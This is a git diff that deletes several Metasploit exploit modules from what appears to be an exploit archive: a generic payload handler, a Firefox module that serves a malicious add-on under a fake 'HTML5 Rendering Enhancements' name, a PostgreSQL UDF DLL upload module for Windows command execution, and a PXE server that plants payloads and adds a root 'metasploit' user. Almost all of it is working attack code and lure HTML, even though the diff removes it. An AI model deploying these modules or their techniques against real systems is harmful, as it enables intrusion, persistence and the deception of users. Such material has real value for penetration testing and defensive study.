'Author' => ['hdm'], - 'Version' => '$Revision: 11845 $', - 'References' => [ ], - 'Payload' => - { - 'Space' => 10000000, - 'BadChars' => '', - 'DisableNops' => true, - }, - 'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ], - 'Arch' => ARCH_ALL, - 'Targets' => [ [ 'Wildcard Target', { } ] ], - 'DefaultTarget' => 0 - )) - - register_advanced_options( - [ - OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]), - OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 0]) - ], self.class) - end - - def exploit - if not datastore['ExitOnSession'] and not job_id - raise RuntimeError, "Setting ExitOnSession to false requires running as a job (exploit -j)" - end - - stime = Time.now.to_f - print_status "Starting the payload handler..." - while(true) - break if session_created? and datastore['ExitOnSession'] - break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) ) - - select(nil,nil,nil,1) - end - end - - -end - diff --git a/platforms/multiple/remote/18730.rb b/platforms/multiple/remote/18730.rb deleted file mode 100755 index a92eb0624..000000000 --- a/platforms/multiple/remote/18730.rb +++ /dev/null @@ -1,226 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'rex' -require 'rex/zip' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpServer::HTML - include Msf::Exploit::EXE - - def initialize( info = {} ) - super( update_info( info, - 'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution', - 'Description' => %q{ - This exploit dynamically creates a .xpi addon file. - The resulting bootstrapped Firefox addon is presented to - the victim via a web page with. The victim's Firefox browser - will pop a dialog asking if they trust the addon. - - Once the user clicks "install", the addon is installed and - executes the payload with full user permissions. As of Firefox - 4, this will work without a restart as the addon is marked to - be "bootstrapped". As the addon will execute the payload after - each Firefox restart, an option can be given to automatically - uninstall the addon once the payload has been executed. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'mihi' ], - 'References' => - [ - [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ], - [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ] - ], - 'DisclosureDate' => 'Jun 27 2007', - 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], - 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => - [ - [ 'Generic (Java Payload)', - { - 'Platform' => ['java'], - 'Arch' => ARCH_JAVA - } - ], - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win', - 'Arch' => ARCH_X86, - } - ], - [ 'Linux x86 (Native Payload)', - { - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - } - ], - [ 'Mac OS X PPC (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_PPC, - } - ], - [ 'Mac OS X x86 (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_X86, - } - ] - ], - 'DefaultTarget' => 1 - )) - - register_options( [ - OptString.new('ADDONNAME', [ true, - "The addon name.", - "HTML5 Rendering Enhancements" - ]), - OptBool.new('AutoUninstall', [ true, - "Automatically uninstall the addon after payload execution", - true - ]) - ], self.class) - end - - def on_request_uri( cli, request ) - msg = "#{cli.peerhost.ljust(16)} #{self.shortname}" - - if not request.uri.match(/\.xpi$/i) - if not request.uri.match(/\/$/) - send_redirect( cli, get_resource() + '/', '') - return - end - - print_status("#{msg} Handling request..." ) - - send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) - return - end - - p = regenerate_payload(cli) - if not p - print_error("#{msg} Failed to generate the payload.") - # Send them a 404 so the browser doesn't hang waiting for data - # that will never come. - send_not_found(cli) - return - end - - # If we haven't returned yet, then this is a request for our xpi, - # so build one - - if target.name == 'Generic (Java Payload)' - jar = p.encoded_jar - jar.build_manifest(:main_class => "metasploit.Payload") - payload_file = jar.pack - payload_name='payload.jar' - payload_script=%q| - var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java - java.lang.System.setSecurityManager(null); - var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]); - var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]); - m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]); - | - else - payload_file = generate_payload_exe - payload_name='payload.exe' - payload_script=%q| - var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); - process.init(tmp); - process.run(false,[],0); - | - end - - zip = Rex::Zip::Archive.new - xpi_guid = '{d0df471a-9896-4e6d-83e2-13a04ed6df33}' #TODO randomize! - - bootstrap_script = %q| -function startup(data, reason) { - var file = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). - get("ProfD", Components.interfaces.nsIFile); - file.append("extensions"); - | - bootstrap_script << %Q|xpi_guid="#{xpi_guid}";| - bootstrap_script << %Q|payload_name="#{payload_name}";| - bootstrap_script << %q| - file.append(xpi_guid); - file.append(payload_name); - var tmp = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). - get("TmpD", Components.interfaces.nsIFile); - tmp.append(payload_name); - tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666); - file.copyTo(tmp.parent, tmp.leafName); - | - bootstrap_script << payload_script - - if (datastore['AutoUninstall']) - bootstrap_script << %q| - try { // Fx < 4.0 - Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); - } catch (e) {} - try { // Fx 4.0 and later - Components.utils.import("resource://gre/modules/AddonManager.jsm"); - AddonManager.getAddonByID(xpi_guid, function(addon) { - addon.uninstall(); - }); - } catch (e) {} - | - end - - bootstrap_script << "}" - - zip.add_file('bootstrap.js', bootstrap_script) - zip.add_file(payload_name, payload_file) - zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n") - zip.add_file('install.rdf', %Q| - - - #{xpi_guid} - #{datastore['ADDONNAME']} - 1.0 - true - true - - - toolkit@mozilla.org - 1.0 - * - - - - - {ec8030f7-c20a-464f-9b0e-13a3a9e97384} - 1.0 - * - - - -|) -zip.add_file('overlay.xul', %q| - - -|) - - print_status("#{msg} Sending xpi and waiting for user to click 'accept'...") - send_response( cli, zip.pack, { 'Content-Type' => 'application/x-xpinstall' } ) - handler( cli ) - end - - def generate_html - html = %Q|Loading, Please Wait...\n| - html << %Q|

Addon required to view this page. [Install]

\n| - html << %Q|\n| - html << %Q|| - return html - end -end diff --git a/platforms/windows/remote/17037.rb b/platforms/windows/remote/17037.rb deleted file mode 100755 index b7baa57c8..000000000 --- a/platforms/windows/remote/17037.rb +++ /dev/null @@ -1,147 +0,0 @@ -## -# $Id: postgres_payload.rb 12115 2011-03-23 21:24:09Z todb $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Postgres - include Msf::Exploit::CmdStagerVBS - - # Creates an instance of this module. - def initialize(info = {}) - super(update_info(info, - 'Name' => 'PostgreSQL for Microsoft Windows Payload Execution', - 'Description' => %q{ - This module creates and enables a custom UDF (user defined function) on the - target host via the UPDATE pg_largeobject method of binary injection. On - default Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres - service account may write to the Windows temp directory, and may source - UDF DLL's from there as well. - - PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are - valid targets for this module. - - NOTE: This module will leave a payload executable on the target system when the - attack is finished, as well as the UDF DLL and the OID. - }, - 'Author' => - [ - 'Bernardo Damele A. G. ', # the postgresql udf libraries - 'todb' # this Metasploit module - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 12115 $', - 'References' => - [ - [ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf', - 'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL - ] - ], - 'Platform' => 'win', - 'Targets' => - [ - [ 'Automatic', { } ], # Confirmed on XXX - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper. - )) - register_options( - [ - OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]) - ]) - - deregister_options('SQL', 'RETURN_ROWSET') - end - - # Buncha stuff to make typing easier. - def username; datastore['USERNAME']; end - def password; datastore['PASSWORD']; end - def database; datastore['DATABASE']; end - def verbose; datastore['VERBOSE']; end - def rhost; datastore['RHOST']; end - def rport; datastore['RPORT']; end - - def execute_command(cmd, opts) - postgres_sys_exec(cmd) - end - - def exploit - version = get_version(username,password,database,verbose) - case version - when :nocompat; print_error "Authentication successful, but not a compatable version." - when :noauth; print_error "Authentication failed." - when :noconn; print_error "Connection failed." - end - return unless version =~ /8\.[234]/ - print_status "Authentication successful and vulnerable version #{version} on Windows confirmed." - tbl,fld,dll,oid = postgres_upload_binary_file(dll_fname(version)) - unless tbl && fld && dll && oid - print_error "Could not upload the UDF DLL" - return - end - print_status "Uploaded #{dll} as OID #{oid} to table #{tbl}(#{fld})" - ret_sys_exec = postgres_create_sys_exec(dll) - if ret_sys_exec - if @postgres_conn - execute_cmdstager({:linemax => 1500, :nodelete => true}) - handler - postgres_logout if @postgres_conn - else - print_error "Lost connection." - return - end - end - postgres_logout if @postgres_conn - end - - def dll_fname(version) - File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll") - end - - # A shorter version of do_fingerprint from the postgres_version scanner - # module, specifically looking for versions that valid targets for this - # module. - def get_version(user=nil,pass=nil,database=nil,verbose=false) - begin - msg = "#{rhost}:#{rport} Postgres -" - password = pass || postgres_password - print_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'") if verbose - result = postgres_fingerprint( - :db => database, - :username => user, - :password => password - ) - if result[:auth] - # So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4 - # This also checks to see if it was compiled with a windows-based compiler -- - # the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw) - # Also, the method to write files to disk doesn't appear to work on 9.0, so - # tabling that version for now. - if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i - return $1 - else - print_status "Found #{result[:auth]}" - return :nocompat - end - else - return :noauth - end - rescue Rex::ConnectionError - print_error "#{rhost}:#{rport} Connection Error: #{$!}" if datastore['VERBOSE'] - return :noconn - end - end - -end - diff --git a/platforms/windows/remote/17626.rb b/platforms/windows/remote/17626.rb deleted file mode 100755 index 422e44e88..000000000 --- a/platforms/windows/remote/17626.rb +++ /dev/null @@ -1,132 +0,0 @@ -## -# $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' -require 'rex/proto/tftp' -require 'rex/proto/dhcp' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::TFTPServer - - def initialize - super( - 'Name' => 'PXE exploit server', - 'Version' => '$Revision: 13493 $', - 'Description' => %q{ - This module provides a PXE server, running a DHCP and TFTP server. - The default configuration loads a linux kernel and initrd into memory that - reads the hard drive; placing the payload on the hard drive of any Windows - partition seen, and add a uid 0 user with username and password metasploit to any - linux partition seen. - }, - 'Author' => [ 'scriptjunkie' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 13493 $', - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 4500, - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows Universal', - { - } - ], - ], - 'Privileged' => true, - 'Stance' => Msf::Exploit::Stance::Passive, - 'DefaultTarget' => 0 - ) - - register_options( - [ - OptInt.new('SESSION', [ false, 'A session to pivot the attack through' ]) - ], self.class) - - register_advanced_options( - [ - OptString.new('TFTPROOT', [ false, 'The TFTP root directory to serve files from' ]), - OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]), - OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]), - OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]), - OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ]) - ], self.class) - end - - def exploit - if not datastore['TFTPROOT'] - datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit') - end - datastore['FILENAME'] = "update1" - datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them! - - # Prepare payload - print_status("Creating initrd") - initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom')) - uncompressed = Rex::Text.ungzip(initrd) - payl = payload.generate - uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl - initrd = Rex::Text.gzip(uncompressed) - - # Meterpreter attack - if framework.sessions.include? datastore['SESSION'] - client = framework.sessions[datastore['SESSION']] - if not client.lanattacks - print_status("Loading lanattacks extension...") - client.core.use("lanattacks") - end - - print_status("Loading DHCP options...") - client.lanattacks.load_dhcp_options(datastore) - 1.upto(4) do |i| - print_status("Loading file #{i} of 4") - if i < 4 - contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) - else - contents = initrd - end - client.lanattacks.add_tftp_file("update#{i}",contents) - end - print_status("Starting TFTP server...") - client.lanattacks.start_tftp - print_status("Starting DHCP server...") - client.lanattacks.start_dhcp - print_status("pxesploit attack started") - return - end - - # normal attack - print_status("Starting TFTP server...") - @tftp = Rex::Proto::TFTP::Server.new - @tftp.set_tftproot(datastore['TFTPROOT']) - @tftp.register_file('update4',initrd) - @tftp.start - - print_status("Starting DHCP server...") - @dhcp = Rex::Proto::DHCP::Server.new( datastore ) - @dhcp.start - print_status("pxesploit attack started") - - # Wait for finish.. - @tftp.thread.join - @dhcp.thread.join - print_status("pxesploit attack completed") - end - -end